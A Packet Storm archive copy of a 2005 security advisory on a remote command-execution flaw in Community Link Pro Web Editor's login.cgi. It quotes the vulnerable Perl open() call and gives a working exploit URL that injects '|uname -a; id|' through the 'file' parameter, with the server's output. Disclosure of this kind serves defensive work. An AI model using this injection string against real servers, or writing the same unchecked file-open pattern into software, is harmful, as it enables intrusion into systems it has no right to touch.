prowebExec.txt

2005-07-01T00:00:00
ID PACKETSTORM:38371
Type packetstorm
Reporter mozako
Modified 2005-07-01T00:00:00

Description

                                        
                                            `- - - - - - - - - - - - - - - - - - - - - - - - -   
BADROOT SECURITY GROUP  
Security Advisory 2005-#0x05  
http://www.badroot.org  
irc.us.azzurra.org ~ #badroot  
- - - - - - - - - - - - - - - - - - - - - - - - -   
  
Authors ....... spher3 (spher3 at fatalimpulse dot net)   
mozako (admin at fatalimpulse dot net)  
Date ............. 29-06-2005  
Product ....... Community Link Pro Web Editor (login.cgi)  
Type ............ Remote Command Execution  
  
o Description:  
============================  
Login.cgi is a login script written in perl by Community Link Pro Web Editor   
that allows to a remote user to login in his own personal page.  
  
o Vulnerable Code:  
============================  
[...]  
open(FILE2,"$memberspath/$FORM{'username'}/$FORM{'file'}");  
foreach (<FILE2>) {  
print;  
}  
close(FILE2);  
[...]  
  
In this code there isn't a control in cgi query and exactly in $FORM{'file'}.  
Without a control you can run system command remotely (Remote   
Command Execution Vulnerability) with a string   
like login.cgi?username=&command=simple&do=edit&password=&file=|COMMAND|.  
  
Example:  
  
http://www.hostvuln.net/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname -a; id|  
  
Linux host.vuln.net 2.6.10-3mdk #1 Tue Feb 22 01:32:42 CET 2005 i686 unknown unknown GNU/Linux  
uid=72(apache) gid=72(apache) groups=72(apache)  
  
  
o Proof of concept:  
============================  
You can download a simple PoC Exploit from:   
http://www.badroot.org/exploits/clogin.pl  
  
Original ADV:  
http://www.badroot.org/advisories/SA0x05  
  
`